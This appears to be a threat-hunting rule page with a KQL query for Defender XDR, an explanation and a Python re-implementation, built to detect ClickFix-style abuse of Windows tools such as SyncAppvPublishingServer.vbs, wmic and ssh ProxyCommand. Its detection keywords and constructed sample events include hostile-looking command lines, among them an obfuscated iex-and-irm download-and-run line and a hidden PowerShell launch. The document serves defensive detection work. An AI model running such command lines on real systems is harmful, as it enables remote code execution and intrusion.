
# *ClickFix LoLBin Abuse*

## Query Information

#### MITRE ATT&CK Technique(s)

| Technique ID | Title | Link |
| --- | --- | --- |
| T1216.002 | System Script Proxy Execution: SyncAppvPublishingServer | https://attack.mitre.org/techniques/T1216/002/ |
| T1047 | Windows Management Instrumentation | https://attack.mitre.org/techniques/T1047/ |

#### Description

This rule detects suspicious command-line activity involving several Windows executables (wscript.exe, cscript.exe, wmic.exe, ssh.exe) when combined with specific keywords. It looks for wscript.exe or cscript.exe executing 'SyncAppvPublishingServer.vbs', wmic.exe executing 'process', 'call', or 'create', or ssh.exe using 'ProxyCommand'. Additionally, the rule filters for command lines containing keywords like 'gal', 'i*x', 'gcm', '*stM*', 'jsdelivr.net', 'github', or 'powershell', which are often associated with malicious activity, obfuscation, or external resource loading.

#### Author
- **Name:** Benjamin Zulliger
- **Github:** https://github.com/benscha/KQLAdvancedHunting
- **LinkedIn:** https://www.linkedin.com/in/benjamin-zulliger/

#### References
- https://www.linkedin.com/posts/mauricefielenbach_threathunting-dfir-cybersecurity-activity-7429953431588659200-c0zE


## Defender XDR
```KQL
//THX to Maurice Fielenbach https://www.linkedin.com/posts/mauricefielenbach_threathunting-dfir-cybersecurity-activity-7429953431588659200-c0zE/
DeviceProcessEvents
| where Timestamp >= ago(7d)
// Stage 1: the LoLBin together with the argument that makes the invocation interesting
| where (
    (FileName in~ ("wscript.exe", "cscript.exe") and ProcessCommandLine has "SyncAppvPublishingServer.vbs")
    or (FileName =~ "wmic.exe" and ProcessCommandLine has_any ("process", "call", "create"))
    or (FileName =~ "ssh.exe" and ProcessCommandLine has "ProxyCommand")
)
// Stage 2: keywords typical of ClickFix one-liners.
// Note: "*" is not a wildcard in has_any, so the original terms "i*x" and "*stM*" matched only the
// literal strings. They are expressed as a regex instead (assumed intent: an obfuscated "iex" such
// as i`e`x, and the "stM" fragment of Invoke-RestMethod); the plain keywords keep has_any.
| where ProcessCommandLine has_any ("gal", "gcm", "jsdelivr.net", "github", "powershell")
    or ProcessCommandLine matches regex @"(?i)\bi\W*e\W*x\b|stM"
```

## Explanation

This query is designed to detect potentially malicious activity on Windows systems by monitoring specific command-line executions. It focuses on suspicious use of certain Windows executables together with keywords that are often associated with malicious behaviour or obfuscation. A simplified breakdown:

1. Time frame: the query looks at events from the past 7 days.

2. Targeted executables:

   - wscript.exe or cscript.exe: the Windows Script Host executables. The query checks whether they are running the script 'SyncAppvPublishingServer.vbs'.
   - wmic.exe: the Windows Management Instrumentation command-line tool. The query checks whether it is used with 'process', 'call', or 'create'.
   - ssh.exe: the Secure Shell client. The query checks whether it is used with the 'ProxyCommand' option.

3. Suspicious keywords: the query further filters the command lines for any of the following, which may indicate malicious activity:

   - "gal", "i*x", "gcm", "stM": fragments of PowerShell aliases and cmdlet names that turn up in obfuscated one-liners (gal is the alias for Get-Alias and gcm for Get-Command; i*x presumably targets Invoke-Expression, iex, and stM the corresponding fragment of Invoke-RestMethod). Note that KQL `has_any` does not treat '*' as a wildcard, so such patterns have to be expressed as a regex to match obfuscated variants.
   - "jsdelivr.net", "github": external resources that might be used to host and load scripts or payloads.
   - "powershell": a powerful scripting language frequently used in attacks.

Overall, the query aims to identify suspicious command-line activity that could indicate abuse of legitimate Windows tools for malicious purposes, aligning with the MITRE ATT&CK techniques listed above.
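To see how the two filter stages behave on concrete events, here is an added Python re-implementation of the rule's logic over constructed sample rows (example code, not part of the original query or the author's repository). It approximates KQL `has` as whole-token matching and shows that `*` inside a `has_any` term is literal, so the starred terms are replaced by a regex whose intent (obfuscated iex, Invoke-RestMethod) is an assumption.

```python
import re

# Constructed sample DeviceProcessEvents rows (not real telemetry); URLs are placeholders.
SAMPLE_EVENTS = [
    {"FileName": "wscript.exe", "ProcessCommandLine":
     'wscript.exe C:\\Windows\\System32\\SyncAppvPublishingServer.vbs "n; i`e`x (irm https://example.invalid/stage)"'},
    {"FileName": "wmic.exe", "ProcessCommandLine":
     'wmic process call create "powershell -w hidden -c PLACEHOLDER"'},
    {"FileName": "ssh.exe", "ProcessCommandLine": "ssh -o ProxyCommand=powershell target"},
    {"FileName": "wmic.exe", "ProcessCommandLine": "wmic process list brief"},   # admin inventory
    {"FileName": "cscript.exe", "ProcessCommandLine": "cscript.exe logon.vbs"},  # routine logon script
]

def kql_has(text, term):
    """Approximate KQL `has`: case-insensitive, term matched as a whole token (non-alphanumeric bounds)."""
    pattern = r"(?<![A-Za-z0-9])" + re.escape(term) + r"(?![A-Za-z0-9])"
    return re.search(pattern, text, re.IGNORECASE) is not None

def kql_has_any(text, terms):
    return any(kql_has(text, t) for t in terms)

def lolbin_stage(event):
    """Stage 1 of the rule: the LoLBin plus the argument that makes the invocation interesting."""
    fn, cl = event["FileName"].lower(), event["ProcessCommandLine"]
    return ((fn in ("wscript.exe", "cscript.exe") and kql_has(cl, "SyncAppvPublishingServer.vbs"))
            or (fn == "wmic.exe" and kql_has_any(cl, ("process", "call", "create")))
            or (fn == "ssh.exe" and kql_has(cl, "ProxyCommand")))

PLAIN_KEYWORDS = ("gal", "gcm", "jsdelivr.net", "github", "powershell")
# Assumed intent of "i*x" / "*stM*": an obfuscated Invoke-Expression (iex) and the stM of Invoke-RestMethod.
OBFUSCATION_RE = re.compile(r"\bi\W*e\W*x\b|stM", re.IGNORECASE)

def keyword_stage(cl, literal_wildcards=False):
    """Stage 2. literal_wildcards=True reproduces has_any("i*x", "*stM*"), where '*' is not a wildcard."""
    if literal_wildcards:
        return kql_has_any(cl, PLAIN_KEYWORDS + ("i*x", "*stM*"))
    return kql_has_any(cl, PLAIN_KEYWORDS) or OBFUSCATION_RE.search(cl) is not None

def run_rule(events, literal_wildcards=False):
    """Return the command lines the rule would flag."""
    return [e["ProcessCommandLine"] for e in events
            if lolbin_stage(e) and keyword_stage(e["ProcessCommandLine"], literal_wildcards)]

if __name__ == "__main__":
    for mode in (True, False):
        print(f"literal wildcards={mode}: {len(run_rule(SAMPLE_EVENTS, mode))} hit(s)")
        for hit in run_rule(SAMPLE_EVENTS, mode):
            print("  HIT", hit)
```

With literal wildcards the obfuscated i`e`x line is missed and only the two events carrying "powershell" are flagged; the regex form catches all three, while the inventory and logon-script rows stay clean in both modes.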

## Details

- Author: Benjamin Zulliger
- Released: February 23, 2026
- Tables: DeviceProcessEvents
